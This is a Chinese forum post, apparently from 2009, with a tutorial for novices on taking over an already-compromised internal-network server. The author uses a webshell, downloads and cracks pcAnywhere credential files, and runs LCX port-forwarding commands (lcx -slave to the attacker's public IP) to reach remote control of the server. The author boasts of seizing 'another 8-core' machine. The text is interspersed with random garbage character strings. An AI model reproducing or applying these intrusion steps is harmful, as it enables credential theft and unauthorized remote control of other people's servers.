|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
8 w0 K/ A4 g/ X/ P; |9 e' l" m" H. L
提权方法:pcanywhere+LCX
7 Z9 c; m2 B& U! _, U4 g
9 O, m, H( q; A6 w: V( \获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
& \3 h) K* w m, y& v( ] I2 o
$ G9 ^/ b2 l, j8 n& Q. H: K在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
% u6 a$ p; M( C$ r: R1 P f
, z0 p+ r- k- U; p0 f \/ T5 R4 W. s# b& E' Q" i; m6 V
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。 q9 y1 F) K; N* g2 L! Q% H
6 p( ~' `* }0 ?" }! A
1 g* Y0 n. O# ^- P呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
) h: h8 t) a( E3 A; i( E) t& [9 g0 w1 |
7 r$ \+ S2 V( R5 M
0 _8 R# G, N& K% H/ t3 L+ }' R
6 h2 N+ t; F6 g# v
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``* q" X( P0 p/ @* ?" g! _9 Y/ ?
, e/ \( L4 f0 t( q+ @( q
, ~5 C7 u+ [3 y* p7 {
LCX的用法再简单说下:" i% \ h5 L& O% U1 r) n
( \: ~4 x4 I, c) H* k. e服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
) K% C7 t3 f: F/ v# m) R7 Z; C
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)- r- G0 ~/ U1 n, Z
8 g8 v' k1 g# A3 p由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
" P M0 g. o# ^% M5 v顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``# M& J' `' E1 y9 U% g, c9 A j
5 F9 }2 c: H- G; G0 K! \
0 K; O& I7 }7 }9 ?8 G; z
. t3 I+ U, O v% _' h$ v( @" T8 E L1 h" X# w0 V! R
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
5 X: c+ p- E; z( z; w% X. b4 N
7 j* L/ f. d7 u2 M: O5 _5 ?6 l* ^% C5 w9 ~8 [
6 r" |5 g3 d$ |0 S) h0 |, \
" R; H, r8 a; J& P我们本地连接试试,输入我们刚破解的账号密码
6 F* |& e v# a" h6 Y7 q z2 T1 F3 h- N
; R/ U1 H! f3 p
呵呵``连接成功,服务器不错,又一个8核^︵^
- E z/ H! w2 @% s
$ X4 x) Y( E4 ~0 p) V: [1 g
- g w+ m3 |, |6 V m- L6 E- ^! t7 t5 a; M" L
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-12-15 15:36
| 
.gif)
